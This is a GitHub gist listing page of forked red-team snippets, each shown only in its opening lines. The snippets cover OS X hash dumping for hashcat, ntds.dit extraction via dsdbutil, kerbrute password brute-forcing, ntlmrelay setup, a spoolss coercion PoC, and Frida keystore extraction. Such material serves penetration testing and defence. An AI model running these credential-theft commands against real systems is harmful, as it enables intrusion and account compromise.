Skip to content

Instantly share code, notes, and snippets.

View filipesam's full-sized avatar

filipesam

22 followers · 70 following
View GitHub Profile
@filipesam
filipesam / osx_hashdump.py
Created September 29, 2018 10:25 — forked from HarmJ0y/osx_hashdump.py
osx_hashdump.py
#!/usr/bin/python
# extracts OSX user hashes and outputs a format crackable with oclHashcat
# adapted from http://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored
# and https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/
#
# automation of approach by @harmj0y
#
# sudo ./osx_hashdump.py
# ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt
@filipesam
filipesam / ubuntu_veil_evasion_setup.sh
Created September 29, 2018 10:30 — forked from HarmJ0y/ubuntu_veil_evasion_setup.sh
This short script will install Metasploit as well as Veil-Evasion on Ubuntu
#!/bin/bash
sudo apt-get install git
cd /tmp/
git clone https://github.com/darkoperator/MSF-Installer.git
cd MSF-Installer
sudo ./msf_install.sh -i
source ~/.bashrc
sudo chmod 0666 /usr/local/share/metasploit-framework/log/production.log
@filipesam
filipesam / dementor.py
Created October 6, 2018 21:41 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
import os
import sys
import argparse
import binascii
import ConfigParser
from time import sleep
@filipesam
filipesam / gist:01c5ad6119ce193340251b76036d44f1
Created November 23, 2018 17:24 — forked from jeffmcjunkin/gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
Useful Cypher queries for BloodHound
---------------
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name
That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------
MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
@filipesam
filipesam / PowerView-3.0-tricks.ps1
Created December 14, 2018 10:38 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@filipesam
filipesam / frida-extract-keystore.py
Created December 20, 2018 17:32 — forked from ceres-c/frida-extract-keystore.py
Automatically extract KeyStore objects and relative password from Android applications with Frida
#!/usr/bin/python3
'''
author: ceres-c
usage: ./frida-extract-keystore.py
Once the keystore(s) have been exported you have to convert them to PKCS12 using keytool
'''
import frida, sys, time
@filipesam
filipesam / pwn-o-magic.md
Created January 22, 2019 22:06
Pwning internal networks automagically

Intro

This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:

git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
@filipesam
filipesam / lowhanging.md
Created January 22, 2019 22:09 — forked from 7MinSec/lowhanging.md
Low-hanging hacker fruit (and how to remove it)

Low Hanging Hacker Fruit

This gist focuses on (relatively) free and (relatively) easy things organizations can do to better protect their networks without buying yet another black box with blinking lights.

Got some ideas of your own that should be on this list? Please leave a comment below!

Implementing a stronger AD password policy

Microsoft has a great paper on the topic that gives some nice high level recommendations:

  • Use a unique password per site
  • Enable complexity
@filipesam
filipesam / dsdbutil.exe
Created June 24, 2019 06:49 — forked from bohops/dsdbutil.exe
yet another native AD database extraction utility
DSDButil
========
- dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)
- Example #1: Using Snapshot GUID obtained from cmd output
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
@filipesam
filipesam / kerberos_attacks_cheatsheet.md
Created December 30, 2019 22:41 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: